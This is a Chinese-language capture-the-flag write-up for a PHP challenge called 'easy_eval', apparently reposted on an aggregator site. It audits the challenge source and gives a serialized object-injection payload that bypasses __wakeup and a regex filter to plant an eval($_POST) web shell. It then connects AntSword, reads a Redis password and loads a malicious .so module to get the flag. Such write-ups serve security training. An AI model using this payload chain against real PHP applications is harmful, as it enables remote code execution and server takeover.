審計代碼

這是A類

其中_call方法會在A類中無其他方法執(zhí)行，為避免報錯時執(zhí)行

其中的eval（）會對括號內(nèi)的命令進行執(zhí)行

_wakeup會使得code為空是我們要避免的。我們可以在序列化后對屬性進行增加來跳過?

class A{public $code = "";function __call($method,$args){eval($this->code);}function __wakeup(){$this->code = "";} }

?這是B類

在反序列化時會，_destruct()方法會執(zhí)行a中的a（）方法

class B{function __destruct(){echo $this->a->a();} }

這是主體部分?

在接收poc的內(nèi)容后會進行判空，然后對BA進行全局正則匹配，匹配結(jié)果以數(shù)組形式記錄下來。

之后會用if語句來判斷匹配成功次數(shù)

if(isset($_REQUEST['poc'])){preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);if (isset($ret[1])) {foreach ($ret[1] as $i) {if(intval($i)!==1){exit("you want to bypass wakeup ? no !");}}unserialize($_REQUEST['poc']); }}else{highlight_file(__FILE__); }

構(gòu)造代碼

下面我們就要構(gòu)造代碼了，思路是這樣的：先構(gòu)造B類添加一個public $a, 而這個a是一個A類。當我們執(zhí)行B類中的_destruct()方法時，我們就會去執(zhí)行A類中的a（）方法，由于沒有a（）于是就會自動執(zhí)行_call方法。這是我們只要將我們想執(zhí)行的指令賦給code就行了。

?這是代碼及序列化后的結(jié)果

O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:19:"eval($_POST['1']); ";}}

為繞過_wakeup我們將A后的屬性加1，為只進行一次正則匹配我們將A變成a（PHP代碼中類名大小寫都行）

O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:19:"eval($_POST['1']); ";}}

之后我試圖用? ？poc=O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:19:"eval($_POST['1']); ";}}連接蟻劍時發(fā)現(xiàn)不行于是將其輸入url注入欄變成下列后在用來連接蟻劍才成功。

??poc=O:1:"B":1:%7Bs:1:"a";O:1:"A":1:%7Bs:4:"code";s:19:"eval($_POST['1']);%20";%7D%7D

現(xiàn)在我們開始連接蟻劍

連接成功后我們可以在config.php中發(fā)現(xiàn)一個redis庫的密碼you_cannot_guess_it

為獲取redis中的內(nèi)容我們需要先通過蟻劍來上傳一個惡意so文件。之后我們需要在蟻劍中添加redis的插件插件添加完成后加載惡意so文件獲取庫目錄下面的flag

這是上傳惡意so文件

打開redis插件

添加并輸入連接密碼

打開后我們加載惡意so文件加載成功后我們輸入相應指令便可獲得flag?

?

總結(jié)

以上是生活随笔為你收集整理的ctf (easy_eval)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。